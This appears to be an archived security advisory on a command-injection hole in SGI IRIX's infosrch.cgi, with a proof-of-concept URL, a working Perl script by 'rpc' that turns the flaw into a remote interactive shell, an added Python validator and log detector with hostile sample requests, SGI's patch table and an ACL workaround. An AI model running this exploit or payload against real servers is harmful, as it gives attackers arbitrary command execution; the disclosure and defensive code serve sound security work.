COMMAND
infosrch.cgi
SYSTEMS AFFECTED
IRIX 6.5-6.5.7
PROBLEM
'jared' found the following. InfoSearch is a web-based interface to
books, manpages, and relnotes, distributed by SGI. No surprises
here: no parsing is done on the 'fname' variable before it is
passed to man2html (i.e. when cmd is 'getdoc' and db is 'man').
Also, fname is the _full path_ to the manpage/relnote! There
could be more vulnerabilities lurking about in this script.
Example:
http://my.really.expensive.sgi.box/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
According to 'rpc', SGI's security advisory regarding infosrch.cgi
minimizes the actual vulnerability. Not only does it allow you to
view any file on the system, an attacker can easily run arbitrary
commands. Below is a simple perl script that demonstrates this.
#!/usr/bin/perl -w
# infosearch.cgi interactive shell.
# usage: ./infosh.pl hostname
# 3/4/00
# --rpc <h@ckz.org>
use IO::Socket;
use CGI ":escape";
$|++;
die "usage: $0 host\n" unless(@ARGV == 1);
($host) = shift @ARGV;
$cgi = "/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|";
# url encode and send a command.
sub send_cmd
{
my($url_command) = $cgi . CGI::escape(shift);
$s = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>"tcp");
if(!$s) { die "denied.\n"; }
print $s "GET $url_command HTTP/1.0\r\n";
print $s "User-Agent: \r\n\r\n";
@result = <$s>;
shift @result until $result[0] =~ /^\r\n/; # uninteresting data.
shift @result; $#result--;
return @result;
}
# draw a pseudo prompt. i like "\h:\w \$ ".
sub prompt
{
@res = send_cmd("/sbin/pwd");
chomp($pwd = $res[0]);
print "$host:", $pwd, "\$ ";
}
prompt;
while(!eof(STDIN)) {
chomp($cmd = <STDIN>);
print send_cmd($cmd);
prompt;
}
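The PROBLEM section above describes two missing checks: fname is never validated before it reaches man2html, and it is accepted as a full path. The Python below is an added example, not code from the advisory, from 'rpc' or from SGI: it shows the allow-list check a CGI handling fname should perform before building a man2html invocation, alongside a detector that flags infosrch.cgi requests in a common-log-format access log whose fname carries a shell metacharacter, a traversal sequence or an absolute path. MAN_ROOT and the sample log lines are constructed for the example and are not taken from any real system.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed directory holding the manual pages; the advisory names none,
# so this is a placeholder for the example only.
MAN_ROOT = "/usr/share/catman"

# Allow-list for a manpage name: letters, digits, '_', '-', '.', '+', ':'
# and nothing else. No '/' (so no full paths) and no shell metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.+:-]{0,63}$")

def unchecked_command(fname: str) -> str:
    """Mirror of the flaw the advisory describes: fname is spliced into the
    man2html command line untouched, so a leading '|' is interpreted by the
    shell. Returned as a string only; nothing is executed."""
    return f"man2html {fname}"

def safe_manpage_path(fname: str) -> Optional[str]:
    """Return an absolute path under MAN_ROOT for an accepted manpage name,
    or None when the name fails the allow-list. The caller should pass the
    result to man2html via an argument vector, not through a shell."""
    if not SAFE_NAME.match(fname):
        return None
    return f"{MAN_ROOT}/{fname}"

# Characters and shapes that have no business in a manpage name:
# shell metacharacters, '../' traversal, or an absolute path.
SUSPECT = re.compile(r"[|;`$&<>\n]|\.\./|^/")

def flag_request(log_line: str) -> Optional[dict]:
    """Parse one common-log-format line. If it is a request to infosrch.cgi
    whose fname looks hostile, return who asked for what; otherwise None."""
    m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"', log_line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.endswith("/infosrch.cgi"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    for fname in qs.get("fname", []):
        # parse_qs already decoded once; decode again so double-encoded
        # metacharacters (e.g. %257C for '|') are not missed.
        fname = unquote(fname)
        if SUSPECT.search(fname):
            return {
                "client": log_line.split()[0],
                "cmd": qs.get("cmd", [""])[0],
                "fname": fname,
            }
    return None

# Constructed sample access-log lines (not from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Mar/2000:12:00:01 -0500] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=ls HTTP/1.0" 200 4120',
    '10.0.0.9 - - [04/Mar/2000:12:00:07 -0500] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=%7C/bin/id HTTP/1.0" 200 87',
    '10.0.0.9 - - [04/Mar/2000:12:00:09 -0500] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=/etc/motd HTTP/1.0" 200 1190',
    '10.0.0.2 - - [04/Mar/2000:12:01:00 -0500] "GET /index.html HTTP/1.0" 200 512',
]

def scan(lines) -> list:
    """Run flag_request over every line and keep the hits."""
    return [hit for hit in (flag_request(line) for line in lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['client']} cmd={hit['cmd']} fname={hit['fname']!r}")
```

The allow-list is deliberately stricter than "strip the pipe character": rejecting anything that is not a plain manpage name closes both problems the advisory names (metacharacters and full paths) at once, and avoids the game of enumerating every dangerous byte. The detector keys on the same properties, so a request the validator would refuse is exactly the kind of request the log scan reports.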
SOLUTION
SGI has investigated the issue and recommends the following steps
for neutralizing the exposure. It is HIGHLY RECOMMENDED that
these measures be implemented on ALL vulnerable SGI systems.
This issue has been corrected in future releases of IRIX.
OS Version       Vulnerable?   Patch #   Other Actions
---------------  -----------   -------   -------------
IRIX 3.x         not tested              Note 1
IRIX 4.x         not tested              Note 1
IRIX 5.X         not tested              Note 1
IRIX 6.0.x-6.1   not tested              Note 1
IRIX 6.2         no                      Note 2
IRIX 6.3-6.4     not tested              Note 1
IRIX 6.5-6.5.7   yes           6.5.8     Note 3 & 4
IRIX 6.5.8       no                      Note 4
Note 1) This version of the IRIX operating system has been retired.
Upgrade to an actively supported IRIX operating system.
See http://support.sgi.com/irix/news/index.html#policy for
more information.
Note 2) This version of the IRIX operating system is in
maintenance mode. Upgrade to an actively supported IRIX
operating system. See
http://support.sgi.com/irix/news/index.html#policy for
more information.
Note 3) See "Temporary Solution" section.
Note 4) If you have not received the IRIX 6.5.8 CDs for IRIX 6.5,
contact your SGI Support Provider or download the IRIX
6.5.8 Maintenance Release Stream.
It's surprising that SGI doesn't mention the Netscape server ACLs
that you can use to prevent this. Given that most SGIs out there
using the online manpages are *workstations*, this is a safe fix.
Note that the ACLs will disable anyone else from getting to the
web server and associated materials. (But hey, if you're using an
SGI/IRIX webserver without securing it, you deserve what you get).
By default, the server software lives in /usr/ns-home. We can use
the ACLs built into the server solution. Simply edit your
magnus.conf file (and replace workstation with the system's name)
and add the following line:
file /usr/ns-home/httpd-workstation/config/magnus.conf:
ACLFile /usr/ns-home/httpacl/generated.httpd-workstation.acl
Then create or edit the file as needed (note the \ to point out
the line wrap; it's all one line in the file). Change
"workstation" to your system's name and 10.1.2.3 to your system's
IP address:
file: /usr/ns-home/httpacl/generated.httpd-workstation.acl:
ACL httpd-workstation_formgen-WRITE-ACL_deny-3633 (PUT, DELETE, MKDIR, \
RMDIR, MOVE) {
Default deny anyone;
}
ACL httpd-workstation_formgen-READ-ACL_allow-3633 (GET, HEAD, POST, INDEX)
{
Default deny anyone;
Default allow anyone at (127.0.0.1, 10.1.2.3);